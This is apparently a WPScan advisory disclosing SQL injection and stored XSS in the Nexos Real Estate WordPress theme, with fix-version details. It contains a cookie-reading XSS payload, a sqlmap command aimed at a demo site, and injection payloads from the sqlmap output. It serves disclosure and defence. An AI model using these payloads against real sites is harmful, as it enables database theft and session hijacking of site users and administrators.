Nexos - Real Estate <= 1.6 - SQL Injection & Persistent XSS



Description
----[]- SQL Injection: -[]----
Vulnerable 'id' parameter is https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=8

----[]- Persistent XSS: -[]----
You need a new user account, then go to any property listing on the website and use «ENQUIRY FORM» on the right sidebar. Vulnerable text area is «Message». Injection will trigger on the https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_messages page many times for any basic user.

Or you can press the «REPORT LISTING» button on any property page and use your payload inside the «Message» text box. Injection will trigger on the https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=listing_reports page when administrator will be online.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">


Edit (WPscanTeam) - This has been hot fixed in v1.6 on September 9th, 2019, so there are two v1.6 out there, one with the issues, and one with the fixes. As a result, the fixed in has been set to 1.6.1 (which does not exist yet, but once a new version is released, the issue won't be displayed anymore)
Proof of Concept
sqlmap --url="https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=8" --cookie="wordpress_logged_in_0123456789=agent%7C1a2b3c4d5e6f7g8h9i0j; wordpress_sec_0123456789=agent%7C0a1b2c3d4e5f6g7h8i9j" --dbs -D geniuscr_nexos --tables

[00:22:56] [INFO] resuming back-end DBMS 'mysql' 
[00:22:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: page=ownlisting_addlisting&id=-1899' OR 8845=8845#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=ownlisting_addlisting&id=6' AND (SELECT 7374 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(7374=7374,1))),0x7162717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fesJ

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: page=ownlisting_addlisting&id=6' OR SLEEP(5)-- wYvo
---

available databases [2]:
[*] geniuscr_nexos
[*] information_schema

Database: geniuscr_nexos
[48 tables]
[REDACTED]

Affects Theme

fixed in version 1.6.1

References

URL https://themeforest.net/item/nexos-real-estate-agency-directory/21126242

Classification

Type MULTI

Miscellaneous

Original Researcher subversa
Submitter subversa
Views 3683
Verified No
WPVDB ID 9887

Timeline

Publicly Published 2019-09-08 (2 months ago)
Added 2019-09-25 (about 2 months ago)
Last Updated 2019-10-14 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin